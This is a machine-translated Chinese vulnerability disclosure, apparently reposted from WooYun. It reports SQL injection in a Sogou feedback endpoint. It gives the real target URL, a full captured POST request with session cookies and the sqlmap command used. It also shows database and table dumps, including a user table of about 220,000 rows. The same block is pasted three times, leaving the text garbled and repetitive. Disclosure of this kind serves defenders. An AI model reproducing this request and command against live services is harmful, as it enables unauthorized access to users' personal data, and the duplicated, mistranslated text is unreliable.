搜狗某处SQL注入泄露22w用户信息
漏洞标题 搜狗某处SQL注入泄露22w用户信息 相关厂商 搜狗 漏洞作者 黑色键盘丶 提交时间 2016-05-15 10:24 公开时间 2016-06-30 08:20 漏洞类型 SQL注射漏洞 …
漏洞标题
搜狗某处SQL注入泄露22w用户信息
相关制造商
搜狗
漏洞作者
黑色键盘丶
提交时间
2016-05-15 10: 24
公共时间
2016-06-30 08: 20
漏洞类型
SQL注入漏洞
危险等级
高
自我评估等级
20
漏洞状态
制造商已确认
标签标签
注射技术
漏洞详细信息
http://fankui.help.sogou.com/index.php/web/web/index?type=6捕获包并阅读它。添加单引号以报告错误。
Sqlmap语法: sqlmap.py -r 1.txt --dbs
----------------数据包-------
POST /index.php/web/web/addShenSu HTTP/1.1
主机: fankui.help.sogou.com
代理连接:保持活动状态
内容长度: 120
接受: application/json,text/javascript,*/*; Q=0.01
来源:http://fankui.help.sogou.com
X-Requested-With: XMLHttpRequest
用户代理: Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.36(KHTML,与Gecko一样)Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
内容类型: application/x-www-form-urlencoded;字符集=UTF-8
Referer:http://fankui.help.sogou.com/index.php/web/web/index?type=6
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh; q=0.8
Cookie: SUV=00D41AA9DE4930F75734A445360CE715; SNUID=465E0E96474D7AE00298446D48 * D629; SUID=0E1649DE2208990A000000005734A933; m=45390 * EEF5AF7959CC32A4FFB401114; GOTO=Af99046; [电子邮件 保护]/* @@@@@@@@@@; YYID=45390 * EEF5AF7959CC32A4FFB401114; LSTMV=320%2C69; LCLKINT=1145; usid=eJINqnJQY9tgFkkg; IPLOC=CN3302; PHPSESSID=bh2gtfs2om3k7a19bom6okc260
参苏%5BwebAdr%5D=HTTP%3A%2F%2Fwww.sogou.com%2F&安培;参苏%5Breason%5D=1&安培;参苏%5Bcontact%5D=313%40q.com&安培; webContactWayType=
数据库信息
可用的数据库[3]:
[*] information_schema
[*] sogou_zhanzhang
[*]测试
当前库表信息
数据库: sogou_zhanzhang
+ ------------------------------- + --------- +
|表|参赛作品|
+ ------------------------------- + --------- +
Deadlink_wap_data | 15191050 |
| url_submit | 547950 |
| url_submit_view | 547950 |
|网站| 270697 |
| website_view | 270697 |
| `user` | 220754 |
|网站地图| 175918 |
| sitemap_copy | 175417 |
| sitemap_view | 168249 |
| site_name | 73232 |
| website_precision | 67856 |
| site_name_view | 65060 |
| fault_block_log | 54773 |
| sitemap_wap | 52806 |
| fault_block | 51056 |
| sitemap_wap_view | 48773 |
| sitemap_invitation | 45320 |
| sitemap_invitation_view | 43771 |
| site_icon | 42416 |
| site_icon_view | 42067 |
| spider_pressure_feedback | 31070 |
| sitemap_invitation_log | 28583 |
| site_logo | 27750 |
| site_logo_view | 25608 |
| site_name_log | 24155 |
| spider_pressure_feedback_view | 23755 |
Web2wap | 20046 |
Web2wap_view | 19268 |
| site_logo_log | 17607 |
| renzheng_log | 16555 |
| supply_fetch | 14501 |
| site_icon_log | 13925 |
| renzheng | 9324 |
| fb_updateshensu | 5427 |
| fb_shensu | 5341 |
Web2wap_log | 4917 |
| fb_img | 3720 |
|重定向| 3696 |
| redirection_view | 3696 |
| tb_member | 3682 |
|反馈| 3270 |
| fb_tool | 2906 |
| feedback_view | 2773 |
| url_shoulu | 2577 |
| umis_waitingfavicon_log | 2568 |
| umis_waitingfavicon | 2520 |
| site_param | 1992年|
| sitemap_blacklist | 1917年|
| site_param_view | 1825年|
| website_precision_log | 1064 |
| user_change_log | 968 |
| redirection_log | 561 |
| fb_suggestion | 289 |
| fb_jubao | 201 |
| fb_record | 153 |
| renzheng_set | 106 |
| fb_kuaizhao | 81 |
| mail_view | 78 |
| backend_user | 74 |
| website_log | 63 |
| product_black_list | 24 |
| user_invitation | 19 |
|通知| 18 |
| fb_updatetool | 14 |
| website_precision_maxid | 7 |
|专栏作家| 5 |
| partner_white_list | 5 |
| mail_group | 1 |
| site_param_log | 1 |
+ ------------------------------- + --------- +
漏洞证明:
http://fankui.help.sogou.com/index.php/web/web/index?type=6捕获包并阅读它。添加单引号以报告错误。
Sqlmap语法: sqlmap.py -r 1.txt --dbs
----------------数据包-------
POST /index.php/web/web/addShenSu HTTP/1.1
主机: fankui.help.sogou.com
代理连接:保持活动状态
内容长度: 120
接受: application/json,text/javascript,*/*; Q=0.01
来源:http://fankui.help.sogou.com
X-Requested-With: XMLHttpRequest
用户代理: Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.36(KHTML,与Gecko一样)Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
内容类型: application/x-www-form-urlencoded;字符集=UTF-8
Referer:http://fankui.help.sogou.com/index.php/web/web/index?type=6
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh; q=0.8
Cookie: SUV=00D41AA9DE4930F75734A445360CE715; SNUID=465E0E96474D7AE00298446D48 * D629; SUID=0E1649DE2208990A000000005734A933; m=45390 * EEF5AF7959CC32A4FFB401114; GOTO=Af99046; [电子邮件 保护]/* @@@@@@@@@@; YYID=45390 * EEF5AF7959CC32A4FFB401114; LSTMV=320%2C69; LCLKINT=1145; usid=eJINqnJQY9tgFkkg; IPLOC=CN3302; PHPSESSID=bh2gtfs2om3k7a19bom6okc260
参苏%5BwebAdr%5D=HTTP%3A%2F%2Fwww.sogou.com%2F&安培;参苏%5Breason%5D=1&安培;参苏%5Bcontact%5D=313%40q.com&安培; webContactWayType=
数据库信息
可用的数据库[3]:
[*] information_schema
[*] sogou_zhanzhang
[*]测试
当前库表信息
数据库: sogou_zhanzhang
+ ------------------------------- + --------- +
|表|参赛作品|
+ ------------------------------- + --------- +
Deadlink_wap_data | 15191050 |
| url_submit | 547950 |
| url_submit_view | 547950 |
|网站| 270697 |
| website_view | 270697 |
| `user` | 220754 |
|网站地图| 175918 |
| sitemap_copy | 175417 |
| sitemap_view | 168249 |
| site_name | 73232 |
| website_precision | 67856 |
| site_name_view | 65060 |
| fault_block_log | 54773 |
| sitemap_wap | 52806 |
| fault_block | 51056 |
| sitemap_wap_view | 48773 |
| sitemap_invitation | 45320 |
| sitemap_invitation_view | 43771 |
| site_icon | 42416 |
| site_icon_view | 42067 |
| spider_pressure_feedback | 31070 |
| sitemap_invitation_log | 28583 |
| site_logo | 27750 |
| site_logo_view | 25608 |
| site_name_log | 24155 |
| spider_pressure_feedback_view | 23755 |
Web2wap | 20046 |
Web2wap_view | 19268 |
| site_logo_log | 17607 |
| renzheng_log | 16555 |
| supply_fetch | 14501 |
| site_icon_log | 13925 |
| renzheng | 9324 |
| fb_updateshensu | 5427 |
| fb_shensu | 5341 |
Web2wap_log | 4917 |
| fb_img | 3720 |
|重定向| 3696 |
| redirection_view | 3696 |
| tb_member | 3682 |
|反馈| 3270 |
| fb_tool | 2906 |
| feedback_view | 2773 |
| url_shoulu | 2577 |
| umis_waitingfavicon_log | 2568 |
| umis_waitingfavicon | 2520 |
| site_param | 1992年|
| sitemap_blacklist | 1917年|
| site_param_view | 1825年|
| website_precision_log | 1064 |
| user_change_log | 968 |
| redirection_log | 561 |
| fb_suggestion | 289 |
| fb_jubao | 201 |
| fb_record | 153 |
| renzheng_set | 106 |
| fb_kuaizhao | 81 |
| mail_view | 78 |
| backend_user | 74 |
| website_log | 63 |
| product_black_list | 24 |
| user_invitation | 19 |
|通知| 18 |
| fb_updatetool | 14 |
| website_precision_maxid | 7 |
|专栏作家| 5 |
| partner_white_list | 5 |
| mail_group | 1 |
| site_param_log | 1 |
+ ------------------------------- + --------- +
修理计划:
过滤
版权声明:请注明出处。黑键盘丶@乌云
Sqlmap语法: sqlmap.py -r 1.txt --dbs
----------------数据包-------
POST /index.php/web/web/addShenSu HTTP/1.1
主机: fankui.help.sogou.com
代理连接:保持活动状态
内容长度: 120
接受: application/json,text/javascript,*/*; Q=0.01
来源:http://fankui.help.sogou.com
X-Requested-With: XMLHttpRequest
用户代理: Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.36(KHTML,与Gecko一样)Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
内容类型: application/x-www-form-urlencoded;字符集=UTF-8
Referer:http://fankui.help.sogou.com/index.php/web/web/index?type=6
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh; q=0.8
Cookie: SUV=00D41AA9DE4930F75734A445360CE715; SNUID=465E0E96474D7AE00298446D48 * D629; SUID=0E1649DE2208990A000000005734A933; m=45390 * EEF5AF7959CC32A4FFB401114; GOTO=Af99046; [电子邮件 保护]/* @@@@@@@@@@; YYID=45390 * EEF5AF7959CC32A4FFB401114; LSTMV=320%2C69; LCLKINT=1145; usid=eJINqnJQY9tgFkkg; IPLOC=CN3302; PHPSESSID=bh2gtfs2om3k7a19bom6okc260
参苏%5BwebAdr%5D=HTTP%3A%2F%2Fwww.sogou.com%2F&安培;参苏%5Breason%5D=1&安培;参苏%5Bcontact%5D=313%40q.com&安培; webContactWayType=
数据库信息
可用的数据库[3]:
[*] information_schema
[*] sogou_zhanzhang
[*]测试
当前库表信息
数据库: sogou_zhanzhang
+ ------------------------------- + --------- +
|表|参赛作品|
+ ------------------------------- + --------- +
Deadlink_wap_data | 15191050 |
| url_submit | 547950 |
| url_submit_view | 547950 |
|网站| 270697 |
| website_view | 270697 |
| `user` | 220754 |
|网站地图| 175918 |
| sitemap_copy | 175417 |
| sitemap_view | 168249 |
| site_name | 73232 |
| website_precision | 67856 |
| site_name_view | 65060 |
| fault_block_log | 54773 |
| sitemap_wap | 52806 |
| fault_block | 51056 |
| sitemap_wap_view | 48773 |
| sitemap_invitation | 45320 |
| sitemap_invitation_view | 43771 |
| site_icon | 42416 |
| site_icon_view | 42067 |
| spider_pressure_feedback | 31070 |
| sitemap_invitation_log | 28583 |
| site_logo | 27750 |
| site_logo_view | 25608 |
| site_name_log | 24155 |
| spider_pressure_feedback_view | 23755 |
Web2wap | 20046 |
Web2wap_view | 19268 |
| site_logo_log | 17607 |
| renzheng_log | 16555 |
| supply_fetch | 14501 |
| site_icon_log | 13925 |
| renzheng | 9324 |
| fb_updateshensu | 5427 |
| fb_shensu | 5341 |
Web2wap_log | 4917 |
| fb_img | 3720 |
|重定向| 3696 |
| redirection_view | 3696 |
| tb_member | 3682 |
|反馈| 3270 |
| fb_tool | 2906 |
| feedback_view | 2773 |
| url_shoulu | 2577 |
| umis_waitingfavicon_log | 2568 |
| umis_waitingfavicon | 2520 |
| site_param | 1992年|
| sitemap_blacklist | 1917年|
| site_param_view | 1825年|
| website_precision_log | 1064 |
| user_change_log | 968 |
| redirection_log | 561 |
| fb_suggestion | 289 |
| fb_jubao | 201 |
| fb_record | 153 |
| renzheng_set | 106 |
| fb_kuaizhao | 81 |
| mail_view | 78 |
| backend_user | 74 |
| website_log | 63 |
| product_black_list | 24 |
| user_invitation | 19 |
|通知| 18 |
| fb_updatetool | 14 |
| website_precision_maxid | 7 |
|专栏作家| 5 |
| partner_white_list | 5 |
| mail_group | 1 |
| site_param_log | 1 |
+ ------------------------------- + --------- +
漏洞证明:
http://fankui.help.sogou.com/index.php/web/web/index?type=6捕获包并阅读它。添加单引号以报告错误。
Sqlmap语法: sqlmap.py -r 1.txt --dbs
----------------数据包-------
POST /index.php/web/web/addShenSu HTTP/1.1
主机: fankui.help.sogou.com
代理连接:保持活动状态
内容长度: 120
接受: application/json,text/javascript,*/*; Q=0.01
来源:http://fankui.help.sogou.com
X-Requested-With: XMLHttpRequest
用户代理: Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.36(KHTML,与Gecko一样)Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
内容类型: application/x-www-form-urlencoded;字符集=UTF-8
Referer:http://fankui.help.sogou.com/index.php/web/web/index?type=6
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh; q=0.8
Cookie: SUV=00D41AA9DE4930F75734A445360CE715; SNUID=465E0E96474D7AE00298446D48 * D629; SUID=0E1649DE2208990A000000005734A933; m=45390 * EEF5AF7959CC32A4FFB401114; GOTO=Af99046; [电子邮件 保护]/* @@@@@@@@@@; YYID=45390 * EEF5AF7959CC32A4FFB401114; LSTMV=320%2C69; LCLKINT=1145; usid=eJINqnJQY9tgFkkg; IPLOC=CN3302; PHPSESSID=bh2gtfs2om3k7a19bom6okc260
参苏%5BwebAdr%5D=HTTP%3A%2F%2Fwww.sogou.com%2F&安培;参苏%5Breason%5D=1&安培;参苏%5Bcontact%5D=313%40q.com&安培; webContactWayType=
数据库信息
可用的数据库[3]:
[*] information_schema
[*] sogou_zhanzhang
[*]测试
当前库表信息
数据库: sogou_zhanzhang
+ ------------------------------- + --------- +
|表|参赛作品|
+ ------------------------------- + --------- +
Deadlink_wap_data | 15191050 |
| url_submit | 547950 |
| url_submit_view | 547950 |
|网站| 270697 |
| website_view | 270697 |
| `user` | 220754 |
|网站地图| 175918 |
| sitemap_copy | 175417 |
| sitemap_view | 168249 |
| site_name | 73232 |
| website_precision | 67856 |
| site_name_view | 65060 |
| fault_block_log | 54773 |
| sitemap_wap | 52806 |
| fault_block | 51056 |
| sitemap_wap_view | 48773 |
| sitemap_invitation | 45320 |
| sitemap_invitation_view | 43771 |
| site_icon | 42416 |
| site_icon_view | 42067 |
| spider_pressure_feedback | 31070 |
| sitemap_invitation_log | 28583 |
| site_logo | 27750 |
| site_logo_view | 25608 |
| site_name_log | 24155 |
| spider_pressure_feedback_view | 23755 |
Web2wap | 20046 |
Web2wap_view | 19268 |
| site_logo_log | 17607 |
| renzheng_log | 16555 |
| supply_fetch | 14501 |
| site_icon_log | 13925 |
| renzheng | 9324 |
| fb_updateshensu | 5427 |
| fb_shensu | 5341 |
Web2wap_log | 4917 |
| fb_img | 3720 |
|重定向| 3696 |
| redirection_view | 3696 |
| tb_member | 3682 |
|反馈| 3270 |
| fb_tool | 2906 |
| feedback_view | 2773 |
| url_shoulu | 2577 |
| umis_waitingfavicon_log | 2568 |
| umis_waitingfavicon | 2520 |
| site_param | 1992年|
| sitemap_blacklist | 1917年|
| site_param_view | 1825年|
| website_precision_log | 1064 |
| user_change_log | 968 |
| redirection_log | 561 |
| fb_suggestion | 289 |
| fb_jubao | 201 |
| fb_record | 153 |
| renzheng_set | 106 |
| fb_kuaizhao | 81 |
| mail_view | 78 |
| backend_user | 74 |
| website_log | 63 |
| product_black_list | 24 |
| user_invitation | 19 |
|通知| 18 |
| fb_updatetool | 14 |
| website_precision_maxid | 7 |
|专栏作家| 5 |
| partner_white_list | 5 |
| mail_group | 1 |
| site_param_log | 1 |
+ ------------------------------- + --------- +
修理计划:
过滤
版权声明:请注明出处。黑键盘丶@乌云
- 发表于 2016-07-17 08:00
- 阅读 ( 600 )
- 分类:黑客技术
